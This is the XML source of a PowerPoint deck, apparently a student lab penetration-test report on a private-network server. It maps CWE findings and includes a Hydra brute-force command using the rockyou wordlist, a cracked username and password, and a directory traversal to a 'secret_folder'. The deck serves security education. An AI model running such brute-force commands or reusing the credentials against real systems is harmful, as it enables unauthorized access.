                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CWE-307: Improper Restriction of Excessive Authentication</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="Arial"/>
                        <a:cs typeface="Arial"/>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r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>System does not implement sufficient measures to prevent multiple failed authentication attempts.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00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rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Bad</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> actors can attempt brute force login attempts without restriction.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00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48209">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>CWE-200: Exposure of Sensitive Information to an Unauthorized Actor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dirty="0" smtClean="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>secret_folder contents were exposed in directory traversal.</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rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 Vulnerability (2021) – files discovered enabled access to WebDAV.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00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48209">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CWE-434: Unrestricted Upload of File with Dangerous Type</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="Arial"/>
                        <a:cs typeface="Arial"/>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smtClean="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Web server allows users to upload files including scripts.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smtClean="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Particularly malicious</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> files could compromise the target.</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1108471">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>CWE-553: Command Shell in Externally Accessible Directory</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                      </a:b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dirty="0" smtClean="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>A possible shell file exists in an accessible directory. This can be used by an attacker to execute commands on the web server. [cwe.mitre.org]</a:t>
                      </a:r>
                      <a:endParaRPr sz="11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smtClean="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Potential exposure of the file system to read data or execute</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> commands.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smtClean="0"/>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Improper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Restriction of Excessive Authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>]</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" b="1" dirty="0" smtClean="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smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Launch a brute force attack in Kali Linux utilizing Hydra.</a:t>
            </a:r>
            <a:endParaRPr lang="en"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dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ex. &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>hydra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>-l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>-P /usr/share/wordlists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>rockyou.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>-s 80 -f -vV 192.168.1.105 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>http-get/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>company_folders/ secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;</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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3362238"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200" dirty="0" smtClean="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Login succeeded with credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>leopoldo</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>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346" y="1525976"/>
            <a:ext cx="3352490" cy="310879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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Exposure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>of Sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>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b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Following NMAP discovery of Capstone server .105, inspection of the directories yields recurring message: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>company_folders/secret_folder/ is no longer accessible to the public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>”.</a:t>
            </a:r>
            <a:endParaRPr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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3391974"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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Directory traversal to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.105/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>company_folders/ secret_folder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>yielded more data on how to access server WebDAV framework.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="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478" y="1480525"/>
            <a:ext cx="3449443" cy="315425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TotalTime>
  <Words>1323</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>213</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Roboto Medium</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto</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Improper Restriction of Excessive Authentication ]</vt:lpstr>
      <vt:lpstr>Exploitation: Exposure of Sensitive Information </vt:lpstr>
      <vt:lpstr>Exploitation: Unrestricted Upload of File with Dangerous Type </vt:lpstr>
      <vt:lpstr>Exploitation: Command Shell in Accessible Directory  </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14192970887</cp:lastModifiedBy>
  <cp:revision>78</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-17T20:23:14Z</dcterms:modified>
</cp:coreProperties>
</file>